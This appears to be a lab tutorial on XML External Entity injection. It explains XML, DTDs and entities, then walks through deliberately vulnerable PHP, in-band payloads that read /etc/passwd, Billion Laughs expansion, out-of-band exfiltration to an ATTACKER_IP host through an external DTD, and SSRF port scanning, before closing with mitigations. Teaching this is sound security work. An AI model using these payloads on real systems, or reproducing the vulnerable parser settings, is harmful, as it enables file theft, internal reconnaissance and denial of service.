XML
What is XML?
XML (Extensible Markup Language) is a markup language derived from SGML (Standard Generalized Markup Language), which is the same standard that HTML is based on. XML is typically used by applications to store and transport data in a format that's both human-readable and machine-parseable.
XML is widely used in web applications for data exchange, storage, and configuration. It's often used by web services and APIs, such as SOAP services and REST APIs that accept XML payloads, to exchange data between systems. XML is also used for configuration files, such as web server configurations or application settings.
Syntax and Structure
XML elements are represented by tags, which are surrounded by angle brackets (<>). Tags usually come in pairs, with the opening tag preceding the content and the closing tag following the content. For example:
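<?xml version="1.0" encoding="UTF-8"?>
<user id="1">
    <name>John</name>
    <age>30</age>
    <address>
        <street>123 Main St</street>
        <city>Anytown</city>
    </address>
</user>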
The tag `<name>` represents an element named "name" with the content "John". Attributes provide additional information about elements and are specified within the opening tag. The tag `<user id="1">` specifies an attribute "id" with the value "1" for the element "user". Character data refers to the content within elements, such as "John".
The example above shows a simple XML document with elements, attributes, and character data. The `<?xml ... ?>` declaration indicates the XML version, and the `<user>` element contains various sub-elements and attributes representing user data.
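As a rough illustration of how a program reads these pieces, the sketch below parses a small document of the same shape with Python's standard `xml.etree.ElementTree` module. The `age`, `street`, and `city` element names and the `describe_user` helper are assumptions made for this example.

```python
import xml.etree.ElementTree as ET

# Sample document; element names other than <user> and <name> are illustrative.
XML_DOC = """<?xml version="1.0"?>
<user id="1">
    <name>John</name>
    <age>30</age>
    <address>
        <street>123 Main St</street>
        <city>Anytown</city>
    </address>
</user>"""


def describe_user(xml_text):
    """Return the root tag, the id attribute, and two pieces of character data."""
    root = ET.fromstring(xml_text)
    return {
        "tag": root.tag,                         # element name
        "id": root.get("id"),                    # attribute value
        "name": root.findtext("name"),           # character data of a child element
        "city": root.findtext("address/city"),   # character data of a nested element
    }


print(describe_user(XML_DOC))
```

The attribute is read with `get()`, while character data is read from the element text, which mirrors the distinction made above.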
What is XSLT?
XSLT (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents. Although XSLT is primarily used for data transformation and formatting, it is also relevant to XXE (XML External Entity) attacks, because an XSLT processor has to parse XML input before transforming it.
XSLT can be used to facilitate XXE attacks in several ways:
- Data Extraction: XSLT can be used to extract sensitive data from an XML document, which can then be used in an XXE attack. For example, an XSLT stylesheet can extract user credentials or other sensitive information from an XML file.
- Entity Expansion: When an XSLT processor parses its input, the underlying XML parser can expand entities defined in the document, including external entities. This can allow an attacker to inject malicious entities, leading to an XXE vulnerability.
- Data Manipulation: XSLT can manipulate data in an XML document, potentially allowing an attacker to inject malicious data or modify existing data to exploit an XXE vulnerability.
- Blind XXE: XSLT can be used to perform blind XXE attacks, in which an attacker injects malicious entities without seeing the server's response.
What are DTDs?
DTDs or Document Type Definitions define the structure and constraints of an XML document. They specify the allowed elements, attributes, and relationships between them. DTDs can be internal within the XML document or external in a separate file.
Purpose and usage of DTDs:
- Validation: DTDs validate the structure of XML to ensure it meets specific criteria before processing, which is crucial in environments where data integrity is key.
- Entity Declaration: DTDs define entities that can be used throughout the XML document, including external entities which are key in XXE attacks.
Internal DTDs are specified using the `<!DOCTYPE>` declaration, while external DTDs are referenced using the `SYSTEM` keyword.
<!DOCTYPE database [
<!ELEMENT database (username, password)>
<!ELEMENT username (#PCDATA)>
<!ELEMENT password (#PCDATA)>
]>
DTDs play a crucial role in XXE injection, as they can be used to declare external entities. External entities can reference external files or URLs, which can lead to malicious data or code injection.
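To make the link between DTDs and external entities concrete, the following sketch lists every entity a DTD declares and shows which ones point outside the document. It uses the `EntityDeclHandler` hook of Python's standard `xml.parsers.expat` module; the sample document, the entity names `greeting` and `secret`, and the `list_entities` helper are assumptions made for illustration.

```python
from xml.parsers import expat

# Hypothetical document: one internal entity and one external entity.
SAMPLE = """<!DOCTYPE database [
<!ELEMENT database (username, password)>
<!ELEMENT username (#PCDATA)>
<!ELEMENT password (#PCDATA)>
<!ENTITY greeting "hello">
<!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<database><username>admin</username><password>example</password></database>"""


def list_entities(xml_text):
    """Return (name, system_id) pairs for every entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # system_id is None for internal entities and a URI for external ones.
        found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


for name, system_id in list_entities(SAMPLE):
    kind = "external" if system_id else "internal"
    print(f"{name}: {kind} {system_id or ''}".rstrip())
```

Because the external entity is only declared and never referenced, nothing is fetched here; the handler simply reports what the DTD asks for.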
XML Entities
XML entities are placeholders for data or code that can be expanded within an XML document. There are five types of entities:
- Internal Entities are essentially variables used within an XML document to define and substitute content that may be repeated multiple times. They are defined in the DTD (Document Type Definition) and can simplify the management of repetitive information. For example:
<!DOCTYPE note [
<!ENTITY inf "This is a test.">
]>
<note>
    <info>&inf;</info>
</note>
In this example, the `&inf;` entity is replaced by its value wherever it appears in the document.
- External Entities are similar to internal entities, but their contents are referenced from outside the XML document, such as from a separate file or URL. This feature can be exploited in XXE (XML External Entity) attacks if the XML processor is configured to resolve external entities. For example:
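<!DOCTYPE note [
<!ENTITY ext SYSTEM "http://example.com/external.dtd">
]>
<note>
    <info>&ext;</info>
</note>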
Here, `&ext;` pulls content from the specified URL, which could be a security risk if the URL is controlled by an attacker.
- Parameter Entities are special types of entities used within DTDs to define reusable structures or to include external DTD subsets. They are particularly useful for modularizing DTDs and for maintaining large-scale XML applications. For example:
<!DOCTYPE note [
<!ENTITY % common "#PCDATA">
<!ELEMENT name (%common;)>
]>
<note>
    <name>John Doe</name>
</note>
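In this case, `%common;` is used within the DTD to define the type of data that the `name` element should contain. Note that the XML specification only permits a parameter-entity reference inside a markup declaration, as shown here, when the declaration lives in an external DTD subset; many parsers reject it in the internal subset.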
- General Entities are similar to variables and can be declared either internally or externally. They are used to define substitutions that can be used within the body of the XML document. Unlike parameter entities, general entities are intended for use in the document content. For example:
<!DOCTYPE note [
<!ENTITY author "John Doe">
]>
<note>
    <writer>&author;</writer>
</note>
The entity `&author;` is a general entity used to substitute the author's name wherever it's referenced in the document.
- Character Entities are used to represent special or reserved characters that cannot be used directly in XML documents. These entities prevent the parser from misinterpreting XML syntax. For example:
- `&lt;` for the less-than symbol (`<`)
- `&gt;` for the greater-than symbol (`>`)
- `&amp;` for the ampersand (`&`)
Use &lt; to represent a less-than symbol.
This usage ensures that the special characters are processed correctly by the XML parser without breaking the document's structure.
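The behaviour of internal and character entities can be observed with Python's standard library. The sketch below assumes a small hypothetical `note` document with an `inf` entity; `xml.etree.ElementTree` substitutes the internal entity while parsing, and `xml.sax.saxutils` converts reserved characters to and from character entities.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, unescape

# Hypothetical document with one internal entity declared in the DTD.
INTERNAL = """<!DOCTYPE note [
<!ENTITY inf "This is a test.">
]>
<note><info>&inf;</info></note>"""


def expand_info(xml_text):
    """Parse the document and return the text of <info> after entity substitution."""
    return ET.fromstring(xml_text).findtext("info")


print(expand_info(INTERNAL))        # the entity reference is replaced by its value
print(escape("1 < 2 & 3 > 2"))      # reserved characters become character entities
print(unescape("1 &lt; 2"))         # and can be converted back
```

Escaping user-supplied text this way before placing it inside an element keeps it from being interpreted as markup.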
The image below shows the type of entities in a DOM structure:
XML Parsing
XML parsing is the process by which an XML file is read, and its information is accessed and manipulated by a software program. XML parsers convert data from XML format into a structure that a program can use (like a DOM tree). During this process, parsers may validate XML data against a schema or a DTD, ensuring the structure conforms to certain rules.
If a parser is configured to process external entities, it can lead to unauthorized access to files, internal systems, or external websites.
Common XML Parsers
Several XML parsers are used across different programming environments; each parser may handle XML data differently, which can affect vulnerability to XXE injection.
- DOM (Document Object Model) Parser: This method builds the entire XML document into a memory-based tree structure, allowing random access to all parts of the document. It is resource-intensive but very flexible.
- SAX (Simple API for XML) Parser: Parses XML data sequentially without loading the whole document into memory, making it suitable for large XML files. However, it is less flexible for accessing XML data randomly.
- StAX (Streaming API for XML) Parser: Similar to SAX, StAX parses XML documents in a streaming fashion but gives the programmer more control over the XML parsing process.
- XPath: Not a parser in itself but a query language that selects nodes from a parsed XML document using path expressions. It is used extensively in conjunction with XSLT.
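The difference between tree-based and event-based parsing can be sketched with Python's standard `xml.dom.minidom` and `xml.sax` modules. The sample document and the `NameCollector` handler are hypothetical; both functions extract the same data, but the DOM version holds the whole tree in memory while the SAX version only reacts to events as they stream past.

```python
import xml.dom.minidom
import xml.sax

# Hypothetical input used by both parsers.
XML_BYTES = b"<users><user><name>John</name></user><user><name>Jane</name></user></users>"


def names_with_dom(data):
    """DOM: load the whole document into a tree, then query it freely."""
    dom = xml.dom.minidom.parseString(data)
    return [node.firstChild.data for node in dom.getElementsByTagName("name")]


class NameCollector(xml.sax.ContentHandler):
    """SAX: the parser pushes events; the handler keeps only the state it needs."""

    def __init__(self):
        super().__init__()
        self.names = []
        self._in_name = False
        self._buffer = []

    def startElement(self, name, attrs):
        if name == "name":
            self._in_name = True
            self._buffer = []

    def characters(self, content):
        if self._in_name:
            self._buffer.append(content)

    def endElement(self, name):
        if name == "name":
            self.names.append("".join(self._buffer))
            self._in_name = False


def names_with_sax(data):
    handler = NameCollector()
    xml.sax.parseString(data, handler)
    return handler.names


print(names_with_dom(XML_BYTES))
print(names_with_sax(XML_BYTES))
```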
In-Band vs Out-of-Band XXE
In-band XXE refers to an XXE vulnerability where the attacker can see the response from the server. This allows for straightforward data exfiltration and exploitation. The attacker can simply send a malicious XML payload to the application, and the server will respond with the extracted data or the result of the attack.
Out-of-band XXE, on the other hand, refers to an XXE vulnerability where the attacker cannot see the response from the server. This requires using alternative channels, such as DNS or HTTP requests, to exfiltrate data. To extract the data, the attacker must craft a malicious XML payload that will trigger an out-of-band request, such as a DNS query or an HTTP request.
In-Band XXE Exploitation
Click the submit button and intercept the request.
The submitted data is processed by contact_submit.php, which contains vulnerable PHP code designed to return the value of the name parameter when a user submits a message in the form. Below is the vulnerable code:
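// Vulnerable: re-enables the external entity loader (deprecated since PHP 8.0)
libxml_disable_entity_loader(false);

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    // Read the raw XML request body
    $xmlData = file_get_contents('php://input');
    $doc = new DOMDocument();
    // Vulnerable: LIBXML_NOENT substitutes entities, LIBXML_DTDLOAD loads external DTDs
    $doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);
    $expandedContent = $doc->getElementsByTagName('name')[0]->textContent;
    // The expanded value of <name> is echoed back to the client
    echo "Thank you, " . $expandedContent . "! Your message has been received.";
}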
Why the Code is Vulnerable
- Entity Expansion is Enabled:
- The line `libxml_disable_entity_loader(false);` explicitly allows external entities to be loaded.
- When `LIBXML_NOENT` is used in the `loadXML()` method, it tells the parser to substitute entity references, including references to external entities, with their actual values.
- External DTD Loading is Enabled:
- The `LIBXML_DTDLOAD` option allows the XML parser to load external DTDs. This is dangerous because an attacker can supply a malicious DTD that defines external entities pointing to sensitive files or network resources.
- No Validation or Sanitization of Input:
- The script directly takes user-supplied XML input from `php://input` and processes it without validating or sanitizing the content.
How XXE Can Be Exploited
Since the application returns the value of the name parameter, we can inject an entity that points to /etc/passwd to disclose its contents.
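<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<contact>
    <name>&xxe;</name>
    <email>[email protected]</email>
    <message>test</message>
</contact>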
Using the payload above, replace the initial XML data submitted to contact_submit.php and resend the request. Don't forget to change the value of the name element to `&xxe;`.
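The same request can also be scripted instead of edited by hand. The sketch below is one possible way to do it with Python's standard `urllib`; the `contact`, `email`, and `message` element names, the placeholder email address, and both helper functions are assumptions that should be adjusted to match the intercepted request.

```python
import urllib.request


def build_inband_payload(target_file="/etc/passwd"):
    """Build an XML body whose <name> element references an external file entity."""
    # Element names other than <name> are assumed, not taken from the application.
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "file://{target_file}">\n'
        "]>\n"
        "<contact>\n"
        "  <name>&xxe;</name>\n"
        "  <email>test@example.com</email>\n"
        "  <message>test</message>\n"
        "</contact>"
    )


def send_payload(url, payload):
    """POST the payload as the raw request body and return the response text."""
    request = urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read().decode("utf-8", errors="replace")


print(build_inband_payload())
```

In a lab setup, `send_payload("http://TARGET_HOST/contact_submit.php", build_inband_payload())` would return the page containing the expanded entity, where `TARGET_HOST` is a placeholder for the lab machine.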
How to Mitigate XXE Vulnerabilities
- Disable External Entity Loading:
- Use `libxml_disable_entity_loader(true);` (for PHP < 8.0).
- For PHP >= 8.0, external entity loading is disabled by default, and `libxml_disable_entity_loader()` is deprecated.
- Do Not Use `LIBXML_NOENT` or `LIBXML_DTDLOAD`:
- Avoid these options unless absolutely necessary. If you must use them, ensure input is from a trusted source.
- Use `LIBXML_NONET`:
- This disables network access during XML parsing:
`$doc->loadXML($xmlData, LIBXML_NONET);`
- Validate and Sanitize Input:
- Ensure the XML input comes only from trusted sources.
- Validate the input against a strict XML schema (XSD) to ensure it doesn't contain unexpected DTDs or entities.
- Consider Alternative Libraries:
- Use functions such as `simplexml_load_string()` without DTD loading, or switch to JSON for safer data transfer.
- Keep Your Software Updated:
- Ensure PHP and any libraries are updated to their latest versions to benefit from security fixes.
// Disable external entity loading; only needed before PHP 8.0, where the call is not yet deprecated
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $xmlData = file_get_contents('php://input');
    $doc = new DOMDocument();
    $doc->loadXML($xmlData, LIBXML_NONET); // Disable network access; no LIBXML_NOENT or LIBXML_DTDLOAD
    $expandedContent = $doc->getElementsByTagName('name')[0]->textContent;
    // Escape the value before echoing it back
    echo "Thank you, " . htmlspecialchars($expandedContent) . "! Your message has been received.";
}
XML Entity Expansion
XML Entity Expansion is a technique often used in XXE attacks that involves defining entities within an XML document, which the XML parser then expands. Attackers can abuse this feature by creating nested or excessively large entities, which leads to a Denial of Service (DoS), or by defining external entities that reference sensitive files or services. This method is central to both in-band and out-of-band XXE, as it allows attackers to inject malicious entities into the XML data. For example:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "This is a test message" >]>
<contact>
    <name>&xxe; &xxe;</name>
    <email>[email protected]</email>
</contact>
In the payload above, `&xxe;` is expanded wherever it appears. Attackers can use entity expansion to perform a Billion Laughs attack, where a small XML document expands through nested entities to consume server resources, leading to a denial of service.
Direct Recursive Entities
A direct recursion occurs when an entity references itself, either directly or in a way that leads to an infinite loop. Here's a simple example:
<!DOCTYPE foo [
<!ENTITY x "&x;">
]>
<foo>&x;</foo>
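In this case, expanding `&x;` yields another `&x;`, which would have to be expanded again, and so on without end. The XML specification forbids entities that reference themselves, so a conforming parser reports an error instead of looping; a parser that lacks this check would recurse indefinitely.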
Indirect Recursive Entities
Indirect recursion occurs when an entity references another entity, which in turn references the original entity, creating a loop. A closely related pattern, and the one attackers rely on in practice, is nested expansion: each entity references the previous one several times, so the output grows exponentially until the parser hits a limit or the system runs out of resources.
Here's an example of nested expansion:
<!DOCTYPE foo [
<!ENTITY x "A">
<!ENTITY y "&x;&x;">
<!ENTITY z "&y;&y;">
]>
<foo>&z;</foo>
- The entity `x` is defined as `"A"`.
- The entity `y` references `&x;&x;`, meaning it will expand to `"AA"`.
- The entity `z` references `&y;&y;`, which means it will expand to `"AAAA"`, because `&y;` is `"AA"`.
- So, `&z;` expands to `"AAAA"`, with the size doubling at each level.
Exponential Growth
Now, imagine if you continued chaining references like this, with each entity expanding further:
<!DOCTYPE foo [
<!ENTITY x "A">
<!ENTITY y "&x;&x;">
<!ENTITY z "&y;&y;">
<!ENTITY w "&z;&z;">
]>
<foo>&w;</foo>
- `&w;` would expand to `&z;&z;`, which then expands to `&y;&y;&y;&y;`, which expands to `&x;&x;&x;&x;&x;&x;&x;&x;`, that is, eight copies of the value of `x`.
- Each step doubles the size of the entity, so the document size grows exponentially as the parser processes the entities.
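The doubling can be measured directly on small inputs. The following sketch generates a chain of nested entities and parses it with Python's standard `xml.etree.ElementTree`; the entity names `e0`, `e1`, and so on, the `root` element, and both helper functions are assumptions made for this example, and the depth is kept deliberately small.

```python
import xml.etree.ElementTree as ET


def build_nested_doc(levels, base="A"):
    """Build a document in which each entity references the previous one twice."""
    decls = [f'<!ENTITY e0 "{base}">']
    for i in range(1, levels + 1):
        decls.append(f'<!ENTITY e{i} "&e{i - 1};&e{i - 1};">')
    dtd = "\n".join(decls)
    return f"<!DOCTYPE root [\n{dtd}\n]>\n<root>&e{levels};</root>"


def expanded_length(levels):
    """Parse the generated document and return the length of the expanded text."""
    # Keep levels small: the goal is to observe the doubling, not to exhaust memory.
    return len(ET.fromstring(build_nested_doc(levels)).text)


for n in range(1, 5):
    print(n, expanded_length(n))
```

The input grows by one short line per level while the parsed text doubles, which is what makes the technique attractive to an attacker.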
The Billion Laughs Attack
In the Billion Laughs attack, this kind of nested entity expansion is used to create a document that expands exponentially and quickly consumes available system resources (CPU, memory, etc.), effectively causing a denial-of-service (DoS) attack.
For example:
<!DOCTYPE foo [
<!ENTITY a "lol">
<!ENTITY b "&a;&a;">
<!ENTITY c "&b;&b;">
<!ENTITY d "&c;&c;">
<!ENTITY e "&d;&d;">
<!ENTITY f "&e;&e;">
]>
<foo>&f;</foo>
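- `&f;` expands to `&e;&e;`, `&e;` expands to `&d;&d;`, and so on, doubling in size at each level.
- With five doubling levels, `&f;` contains only 32 copies of `&a;`, but the growth is exponential: the classic form of the attack uses ten references per level across nine levels, which yields a billion (10^9) copies of the base string.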
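The size of the fully expanded text follows from simple arithmetic: the length of the base string multiplied by the number of references per level, raised to the number of levels. The helper below is a hypothetical illustration; the three-character base string in the second call is an assumption.

```python
def expanded_size(base_length, refs_per_level, levels):
    """Characters produced when each level references the previous one refs_per_level times."""
    return base_length * refs_per_level ** levels


# Five doubling levels over a one-character base string.
print(expanded_size(1, 2, 5))

# Ten references per level across nine levels, with an assumed three-character base string.
print(expanded_size(3, 10, 9))
```

The second case amounts to roughly three billion characters produced from a document of well under a kilobyte.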
Out-Of-Band XXE
The application uses the code below when a user uploads a file:
libxml_disable_entity_loader(false);
$xmlData = file_get_contents('php://input');

$doc = new DOMDocument();
$doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);

$links = $doc->getElementsByTagName('file');
foreach ($links as $link) {
    $fileLink = $link->nodeValue;
    $stmt = $conn->prepare("INSERT INTO uploads (link, uploaded_date) VALUES (?, NOW())");
    $stmt->bind_param("s", $fileLink);
    $stmt->execute();

    if ($stmt->affected_rows > 0) {
        echo "Link saved successfully.";
    } else {
        echo "Error saving link.";
    }
    $stmt->close();
}
The code above doesn't return the values of the submitted XML data. Hence the term out-of-band: the exfiltrated data has to be captured using an attacker-controlled server.
For this attack, we will need a server that will receive data from other servers.
python3 -m http.server 1337
Upload a file in the application and monitor the request that is sent to submit.php using Burp. Forward the request below to Burp Repeater.
Using the payload below, replace the value of the XML file in the request and resend it. Note that you have to replace the ATTACKER_IP variable with your own IP.
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://ATTACKER_IP:1337/" >]>
<upload>
    <file>&xxe;</file>
</upload>
Send the modified HTTP request.
After sending the modified HTTP request, the Python web server will receive a connection from the target machine. This connection confirms that the parser resolves external entities and can reach the attacker-controlled server, so data can be exfiltrated from the application out of band.
We can now create a DTD file that contains an external entity with a PHP filter to exfiltrate data from the target web application.
Save the sample DTD file below and name it sample.dtd. The payload below will exfiltrate the contents of /etc/passwd and send the response back to the attacker-controlled server:
<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://ATTACKER_IP:1337/?data=%cmd;'>">
%oobxxe;
DTD Payload Explained
The DTD begins with a declaration of the parameter entity `%cmd` that points to a system resource. The `%cmd` entity refers to a resource within the PHP filter protocol, `php://filter/convert.base64-encode/resource=/etc/passwd`. It retrieves the content of `/etc/passwd`, a standard file in Unix-based systems containing user account information. The `convert.base64-encode` filter encodes the content in Base64 format to avoid formatting problems. The `%oobxxe` entity contains another XML entity declaration, `exfil`, which has a system identifier pointing to the attacker-controlled server. It includes a parameter named data with `%cmd;`, representing the Base64-encoded content of `/etc/passwd`. When `%oobxxe;` is parsed, it creates the `exfil` entity that connects to the attacker's server (`http://ATTACKER_IP:1337/`). The parameter `?data=%cmd;` sends the Base64-encoded content from `%cmd`.
Go back to the repeater and change your payload to:
<!DOCTYPE upload SYSTEM "http://ATTACKER_IP:1337/sample.dtd">
<upload>
    <file>&exfil;</file>
</upload>
Resend the request and check your terminal. You will receive two (2) requests. The first is the request for the sample.dtd file, and the second is the request sent by the vulnerable application containing the encoded /etc/passwd.
Decoding the exfiltrated Base64 data, for example with CyberChef, reveals the contents of /etc/passwd.
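The decoding step can also be done locally. The sketch below takes the request path as it appears in the web server log (for example `/?data=...`) and returns the decoded text; the `decode_exfil` helper and the sample line are assumptions made for illustration, not output captured from the lab.

```python
import base64
from urllib.parse import parse_qs, urlparse


def decode_exfil(request_path):
    """Extract the `data` query parameter from a logged path and Base64-decode it."""
    values = parse_qs(urlparse(request_path).query).get("data", [])
    if not values:
        return ""
    # parse_qs turns "+" into a space, so restore it before decoding.
    encoded = values[0].replace(" ", "+")
    # Re-add padding in case it was dropped in transit.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Hypothetical logged request built from a made-up passwd line.
sample_line = "root:x:0:0:root:/root:/bin/bash\n"
logged_path = "/?data=" + base64.b64encode(sample_line.encode()).decode()
print(decode_exfil(logged_path), end="")
```

Restoring `+` characters matters because Base64 output can contain them, and query-string parsing would otherwise corrupt the data.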
SSRF + XXE
Server-Side Request Forgery (SSRF) attacks occur when an attacker abuses functionality on a server, causing the server to make requests to an unintended location. In the context of XXE, an attacker can manipulate XML input to make the server issue requests to internal services or access internal files. This technique can be used to scan internal networks, access restricted endpoints, or interact with services that are only accessible from the server’s local network.
Internal Network Scanning
Consider a scenario where a vulnerable server hosts another web application internally on a non-standard port. An attacker can exploit an XXE vulnerability that makes the server send a request to its own internal network resource.
For example, using the captured request from the in-band XXE task, send the captured request to Burp Intruder and use the payload below:
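<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:§10§/" >
]>
<contact>
    <name>&xxe;</name>
    <email>[email protected]</email>
    <message>test</message>
</contact>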
The external entity is set to fetch data from `http://localhost:§10§/`. Intruder will then repeat the request for each port number and search for an internal service running on the server.
Steps to brute force for open ports:
- Once the captured request from the In-Band XXE is in Intruder, highlight the port and click the Add § button.
- In the Payloads tab, set the payload type to Numbers with the Payload settings from 1 to 65535.
- Once done, click the Start attack button and click the Length column to sort which item has the largest size. The difference in the server's response size is worth further investigation since it might contain information that is different compared to the other intruder requests.
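The idea behind sorting by the Length column can be expressed in a few lines: most ports produce the same response size, and the interesting ones deviate from it. The sketch below assumes the response lengths have already been collected per port (for instance, exported from Intruder); the `find_outlier_ports` helper and the numbers are made up for illustration.

```python
from collections import Counter


def find_outlier_ports(response_lengths):
    """Return the ports whose response length differs from the most common length."""
    if not response_lengths:
        return []
    baseline, _ = Counter(response_lengths.values()).most_common(1)[0]
    return sorted(port for port, length in response_lengths.items() if length != baseline)


# Hypothetical results: port -> response length in bytes.
observed = {80: 512, 81: 243, 82: 243, 83: 243, 8080: 1900}
print(find_outlier_ports(observed))
```

Comparing against the most common length, rather than only the largest value, also surfaces ports that return a shorter but still unusual response.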
How the Server Processes This:
The entity `&xxe;` is referenced within the `<name>` tag, triggering the server to make an HTTP request to the specified URL when the XML is parsed. The response of the requested resource will then be included in the server response. If an application contains secret keys, API keys, or hardcoded passwords, this information can then be used in another form of attack, such as password reuse.
Potential Security Implications
- Reconnaissance: Attackers can discover services running on internal network ports and gain insights into the server's internal architecture.
- Data Leakage: If the internal service returns sensitive information, it could be exposed externally through errors or XML data output.
- Elevation of Privilege: Accessing internal services could lead to further exploits, potentially escalating an attacker's capabilities within the network.
Mitigation
Avoiding Misconfigurations
Misconfigurations in XML parser settings are a common cause of XXE-related vulnerabilities. Adjusting these settings can significantly reduce the risk of XXE attacks. Below are detailed guidelines and best practices for several popular programming languages and frameworks.
General Best Practices
- Disable External Entities and DTDs: As a best practice, disable the processing of external entities and DTDs in your XML parsers. Most XXE vulnerabilities arise from malicious DTDs.
- Use Less Complex Data Formats: Where possible, consider using simpler data formats like JSON, which do not allow the specification of external entities.
- Allowlisting Input Validation: Validate all incoming data against a strict schema that defines expected data types and patterns. Exclude or escape XML-specific characters such as <, >, &, ', and ". These characters are crucial in XML syntax and can lead to injection attacks if misused.
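One simple way to apply the first practice is to refuse any document that carries a DOCTYPE before it reaches the application's real parser. The sketch below does this with the `StartDoctypeDeclHandler` hook of Python's standard `xml.parsers.expat` module; the `DoctypeForbidden` exception and the helper names are assumptions made for this example, and malformed input still raises expat's own error.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def ensure_no_doctype(xml_text):
    """Parse the input and raise DoctypeForbidden as soon as a DOCTYPE is seen."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


def has_doctype(xml_text):
    """Return True if the input contains a DOCTYPE declaration."""
    try:
        ensure_no_doctype(xml_text)
    except DoctypeForbidden:
        return True
    return False


malicious = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
print(has_doctype(malicious))
print(has_doctype("<contact><name>John</name></contact>"))
```

Rejecting the DOCTYPE outright removes both external entities and nested entity expansion, since neither can be declared without a DTD.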
Mitigation Techniques in Popular Languages
Java
Use the `DocumentBuilderFactory` and disable DTDs:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
.NET
Configure XML readers to ignore DTDs and external entities:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
PHP
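Disable loading of external entities by libxml (needed for PHP < 8.0; the function is deprecated in PHP 8.0, where external entity loading is already disabled by default):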
libxml_disable_entity_loader(true);
Python
Use the `defusedxml` library, which is designed to mitigate XML vulnerabilities:
from defusedxml.ElementTree import parse
et = parse(xml_input)
Regularly Update and Patch
- Software Updates: Keep all XML processors and libraries up-to-date. Vendors frequently patch known vulnerabilities.
- Security Patches: Regularly apply security patches to web applications and their environments.
Security Awareness and Code Reviews
- Conduct Code Reviews: Regularly review code for security vulnerabilities, especially code that handles XML input and parsing.
- Promote Security Training: Ensure developers are aware of secure coding practices, including the risks associated with XML parsing.